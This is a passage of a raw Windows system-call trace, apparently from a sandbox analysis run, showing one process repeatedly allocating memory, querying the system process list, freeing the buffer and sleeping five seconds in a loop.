ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.085] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.092] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.123] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.130] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.137] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.144] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.151] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.158] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.173] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.184] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.207] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.221] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.229] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.236] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.247] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.255] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 